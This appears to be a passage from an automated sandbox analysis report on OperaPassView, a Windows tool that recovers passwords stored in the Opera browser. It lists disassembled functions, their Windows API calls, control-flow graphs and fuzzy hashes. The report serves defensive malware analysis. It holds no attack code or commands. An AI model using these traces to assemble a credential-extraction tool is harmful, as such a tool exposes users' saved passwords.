                                        control_flow_graph 185 408c56-408c86 call 401dc8 188 408d28-408d31 185->188 189 408c8c-408c95 185->189 190 408ca2 189->190 191 408c97-408ca0 call 40454d 189->191 193 408ca7-408cb6 _wcsicmp 190->193 191->193 195 408cb8-408cb9 193->195 196 408cbb-408cc2 call 408bc0 193->196 197 408cc4-408cc8 195->197 196->197 199 408ccb-408cd8 196->199 197->199 199->189 201 408cda-408cdf 199->201 201->188 202 408ce1-408cf9 call 408150 call 4078e5 201->202 207 408d04 202->207 208 408cfb-408d02 call 40454d 202->208 210 408d09-408d14 call 406eee 207->210 208->210 213 408d19-408d23 call 408409 210->213 213->188
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00408CAD
                                          • Part of subcall function 00408BC0: _wcsicmp.MSVCRT ref: 00408BC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /stext
                                        • API String ID: 2081463915-3817206916
                                        • Opcode ID: 64707a9a51d8eba358d02dd674303af0b4e945527d11ee965fa2c5d6d56f0a03
                                        • Instruction ID: 6c959480c053d333f8a6b6221491e3d2ceffcc90531821a7b641c9a82b32392d
                                        • Opcode Fuzzy Hash: 64707a9a51d8eba358d02dd674303af0b4e945527d11ee965fa2c5d6d56f0a03
                                        • Instruction Fuzzy Hash: 672171312142049FD700AF579981A5A37E5EFD4318F10447FF899BF282DF79A8018B6A
                                        Function 0040A764 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 215 40a764-40a775 216 40a786-40a793 GetPrivateProfileStringW 215->216 217 40a777-40a784 WritePrivateProfileStringW 215->217 218 40a799-40a79d 216->218 217->218
                                        APIs
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A77E
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 0040A793
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfileString$Write
                                        • String ID:
                                        • API String ID: 2948465352-0
                                        • Opcode ID: f4a82916b1e0431dc8ece45825df8e7d6a171639940823de7da9e9e15d1772e4
                                        • Instruction ID: 40d9067811e5fdefbedcbc10adba8553b8dd249bfe1a2ca3aad13c684c334763
                                        • Opcode Fuzzy Hash: f4a82916b1e0431dc8ece45825df8e7d6a171639940823de7da9e9e15d1772e4
                                        • Instruction Fuzzy Hash: 4AE0E53604020DFBCF018FA0DD88EEA3B79AB08308F04C529BA1999061C736C536EBA5
                                        Function 0040A4AC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 40a4ac-40a4b6 220 40a4b8-40a4c9 call 40a3b9 219->220 221 40a4ca-40a4dc GetPrivateProfileIntW 219->221
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0040A4D3
                                          • Part of subcall function 0040A3B9: memset.MSVCRT ref: 0040A3D8
                                          • Part of subcall function 0040A3B9: _itow.MSVCRT ref: 0040A3EF
                                          • Part of subcall function 0040A3B9: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040A3FE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        • Opcode ID: 965a588e9c93152147c1e3fa739ecc5a5bb65bfc638b42a4412db2d146051a2a
                                        • Instruction ID: 18a49fe9df3f170761e63d2b61cf9b5c2f74bedf8807eb1637f337264b4ddbe6
                                        • Opcode Fuzzy Hash: 965a588e9c93152147c1e3fa739ecc5a5bb65bfc638b42a4412db2d146051a2a
                                        • Instruction Fuzzy Hash: D9E0BD3200020DEBDF125F90EC05AAA3BA6FF14315F24866AFE5C24160D37295B0EB89
                                        Function 0040429D Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 224 40429d-4042bb WriteFile
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00401E28,?,?,00000000,?), ref: 004042B4
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: f7cb4ad073e445e46a170c7d98e7b835c3a4e02ef0d256329d2e1587878cb5e6
                                        • Instruction ID: 44ca31bac7325476affb0a5a8a4e30de110c9927306568b9f6297b12081be1b6
                                        • Opcode Fuzzy Hash: f7cb4ad073e445e46a170c7d98e7b835c3a4e02ef0d256329d2e1587878cb5e6
                                        • Instruction Fuzzy Hash: 09D0923511020DFBDF018F80DD06B997BA9EB04359F104054BA04A5060C7B59A10AB54
                                        Function 00403979 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 225 403979-403991 CreateFileW
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00406D71,?), ref: 0040398B
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 70c5500d9cdd9ab5da579220ae7798c66593d576d3ca681fc37e6930cfdfa8a3
                                        • Instruction ID: bc3eb4ca2c7e2e880f5dea7d521545ca3cd7666ee5b46d0ef391399bf6367a8f
                                        • Opcode Fuzzy Hash: 70c5500d9cdd9ab5da579220ae7798c66593d576d3ca681fc37e6930cfdfa8a3
                                        • Instruction Fuzzy Hash: 54C012F0250302FEFF204B10AD4AF37395DE780704F2084207E00F40E1D2B14C41D924
                                        Function 0040A86C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 226 40a86c-40a884 EnumResourceNamesW
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_0000A7E6,00000000), ref: 0040A87B
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 6f1b4270c9ccc508f8355bcb726170f444d9a0e27a8a615aa5e15917959b622a
                                        • Instruction ID: f1b79075368d7f3302d5c16def4a05d75f3a67994f6a28744877584c49ca99fa
                                        • Opcode Fuzzy Hash: 6f1b4270c9ccc508f8355bcb726170f444d9a0e27a8a615aa5e15917959b622a
                                        • Instruction Fuzzy Hash: DBC09B31594341D7C711DF609D45F1AB6A5BB69705F108D397151A40E0C7718024DA05
                                        Function 00403CB3 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 227 403cb3-403cc7 GetFileAttributesW
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00405371,?,00405428,00000000,?,00000000,00000208), ref: 00403CB7
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 7972945271e20ad746e209f09ada209896a6e2a7f5211ef5cd7ef869261963fc
                                        • Instruction ID: 8145a2f8594110c4b38fb2f1cb2a7870fdd634be9abe19054bc204d55fbc2e7d
                                        • Opcode Fuzzy Hash: 7972945271e20ad746e209f09ada209896a6e2a7f5211ef5cd7ef869261963fc
                                        • Instruction Fuzzy Hash: D1B01275210000CFCB1807349D8504D76525F44631720473CB033D00F0DB30CC60FA00
                                        Function 00406EEE Relevance: 1.4, APIs: 1, Instructions: 102COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405BD5: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405BF7
                                          • Part of subcall function 00405BD5: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C8C
                                          • Part of subcall function 00403979: CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00406D71,?), ref: 0040398B
                                        • CloseHandle.KERNELBASE(?), ref: 00406FD2
                                          • Part of subcall function 0040429D: WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,00401E28,?,?,00000000,?), ref: 004042B4
                                          • Part of subcall function 004039D9: GetLastError.KERNEL32 ref: 004039ED
                                          • Part of subcall function 004039D9: _snwprintf.MSVCRT ref: 00403A1A
                                          • Part of subcall function 004039D9: MessageBoxW.USER32(?,?,Error,00000030), ref: 00403A33
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateErrorHandleLastMessageWrite_snwprintf
                                        • String ID:
                                        • API String ID: 630946551-0
                                        • Opcode ID: 2b7cd5079391e9d8e55a69fd821202ef4b4eaf6bdb143ee368991e79ac058e55
                                        • Instruction ID: 64313440329800f9810f307c06da1c2bcf1b1abd5f9e92a2a996e6603ed7f5a3
                                        • Opcode Fuzzy Hash: 2b7cd5079391e9d8e55a69fd821202ef4b4eaf6bdb143ee368991e79ac058e55
                                        • Instruction Fuzzy Hash: 7A31B571700101AFCB24AF69D889E5E7BA9AF48715F11447FF44BAB2D1CB389D90CB58
                                        Function 0040459C Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 8563d17b0dccb6363eb3bc78f873fa2705b264ca117ec91251e6f4b542df73af
                                        • Instruction ID: 65d3eccb63d21b72dd929ec341c4414f44add3eddc226cefbfcf3e612d681bbc
                                        • Opcode Fuzzy Hash: 8563d17b0dccb6363eb3bc78f873fa2705b264ca117ec91251e6f4b542df73af
                                        • Instruction Fuzzy Hash: D8C08CB24107018FE7309F22C809323B3E4EF4072BF608C1D90D0920C1D77CD480CA08

                                        Non-executed Functions

                                        Function 00403B17 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00403B21
                                          • Part of subcall function 00403960: CreateFileW.KERNEL32(00000003,80000000,00000003,00000000,00000003,00000000,00000000,00403B2F,?), ref: 00403972
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00403B3E
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00403B4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00403B5C
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00403B6F
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00403B81
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00403B8A
                                        • GetLastError.KERNEL32 ref: 00403B92
                                        • CloseHandle.KERNEL32(?), ref: 00403B9E
                                        • GetLastError.KERNEL32 ref: 00403BA9
                                        • CloseClipboard.USER32 ref: 00403BB2
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: 0db2833bbf710edc4002946b08285dc8a0adc3005e02f9950c9bdb69ed800eb3
                                        • Instruction ID: 6180a8f7ef76292c9a3a20267fe9ddcfe1b9c844075d3e570f8186bb1a9e56aa
                                        • Opcode Fuzzy Hash: 0db2833bbf710edc4002946b08285dc8a0adc3005e02f9950c9bdb69ed800eb3
                                        • Instruction Fuzzy Hash: A6111C76900208FBD7105FE4ED8CA5E7E78EB04316F104276F906F1291DB749A05DA69
                                        Function 00407FBA Relevance: 9.1, APIs: 6, Instructions: 55fileclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00407FD1
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FE3
                                        • GetTempFileNameW.KERNEL32(?,0040DF40,00000000,00000000), ref: 00408006
                                        • OpenClipboard.USER32(00000000), ref: 00408030
                                        • GetLastError.KERNEL32 ref: 00408049
                                        • DeleteFileW.KERNEL32(00000000), ref: 00408068
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: f38ebe6f4373c20ecce6a77353dd9227b6d8f424a55b39871be9a66ea2fac60e
                                        • Instruction ID: feb814f71b764bc893c0f87020e80892dea5429282502041cd83414046d32cac
                                        • Opcode Fuzzy Hash: f38ebe6f4373c20ecce6a77353dd9227b6d8f424a55b39871be9a66ea2fac60e
                                        • Instruction Fuzzy Hash: 1B115471600308DADB20DBA0DD89FDB77BD6B00704F00057AB555F21D1DF78A9C48B29
                                        Function 0040109F Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004010F7
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401109
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040113F
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114C
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040117A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040118C
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
                                        • LoadCursorW.USER32(00000000,00000067), ref: 0040119E
                                        • SetCursor.USER32(00000000,?,?), ref: 004011A5
                                        • GetDlgItem.USER32(?,000003EE), ref: 004011C6
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011ED
                                        • SetBkMode.GDI32(?,00000001), ref: 004011F9
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401207
                                        • GetSysColorBrush.USER32(0000000F), ref: 0040120F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401230
                                        • EndDialog.USER32(?,?), ref: 00401265
                                        • DeleteObject.GDI32(?), ref: 00401271
                                        • GetDlgItem.USER32(?,000003ED), ref: 00401296
                                        • ShowWindow.USER32(00000000), ref: 0040129F
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012AB
                                        • ShowWindow.USER32(00000000), ref: 004012AE
                                        • SetDlgItemTextW.USER32(?,000003EE,00410E88), ref: 004012BF
                                        • SetWindowTextW.USER32(?,OperaPassView), ref: 004012CD
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004012E5
                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004012F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: OperaPassView
                                        • API String ID: 829165378-491582363
                                        • Opcode ID: 44c3fea5d5aaf05a1ae1a793020c2e01a364cb6e94ecba1d8cb3666bd2b1d1f9
                                        • Instruction ID: a12a850719dd4dff80d3421bec8904e412416a354020c0a85a33f63fcb6912c6
                                        • Opcode Fuzzy Hash: 44c3fea5d5aaf05a1ae1a793020c2e01a364cb6e94ecba1d8cb3666bd2b1d1f9
                                        • Instruction Fuzzy Hash: E151A131500309EBDB22AF61DD85E6E7BB5EB04301F10853AFA56BA5F0C7749991DF08
                                        Function 00409810 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 00409855
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040986D
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040988B
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00409897
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040989F
                                        • memset.MSVCRT ref: 004098C6
                                        • memset.MSVCRT ref: 004098E8
                                        • memset.MSVCRT ref: 00409901
                                        • memset.MSVCRT ref: 00409915
                                        • memset.MSVCRT ref: 0040992F
                                        • memset.MSVCRT ref: 00409944
                                        • GetCurrentProcess.KERNEL32 ref: 0040994C
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040996F
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 004099A1
                                        • memset.MSVCRT ref: 004099F4
                                        • GetCurrentProcessId.KERNEL32 ref: 00409A02
                                        • memcpy.MSVCRT(?,00410820,0000021C), ref: 00409A30
                                        • wcscpy.MSVCRT ref: 00409A53
                                        • _snwprintf.MSVCRT ref: 00409AC2
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 00409ADA
                                        • GetDlgItem.USER32(?,000003EA), ref: 00409AE4
                                        • SetFocus.USER32(00000000), ref: 00409AEB
                                        Strings
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00409AB7
                                        • {Unknown}, xrefs: 004098DA
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: 007ae5658ee67c496a52f2f0c58de467b094a3f2f94befcb10f6f0759da7e3ca
                                        • Instruction ID: 2e49bca4ceb178242313f370ad9eea42edebf1a9a74c4768f4a1d173b23e745a
                                        • Opcode Fuzzy Hash: 007ae5658ee67c496a52f2f0c58de467b094a3f2f94befcb10f6f0759da7e3ca
                                        • Instruction Fuzzy Hash: 4C7162B280011DEFDB21AB51DC85EDA7B6DEF08354F00417AF508B6191DB799E84CFA8
                                        Function 00409FCA Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00409FF7
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040A003
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A045
                                        • GetWindowRect.USER32(?,?), ref: 0040A050
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A064
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A072
                                        • 73A1A570.USER32(?,?,?), ref: 0040A0AB
                                        • wcslen.MSVCRT ref: 0040A0EB
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040A0FC
                                        • _snwprintf.MSVCRT ref: 0040A20C
                                        • SetWindowTextW.USER32(?,?), ref: 0040A220
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040A23E
                                        • GetDlgItem.USER32(?,00000001), ref: 0040A274
                                        • GetWindowRect.USER32(00000000,?), ref: 0040A284
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040A292
                                        • GetClientRect.USER32(?,?), ref: 0040A2A9
                                        • GetWindowRect.USER32(?,?), ref: 0040A2B3
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040A2F9
                                        • GetClientRect.USER32(?,?), ref: 0040A303
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040A33B
                                        Strings
                                        Memory Dump Source
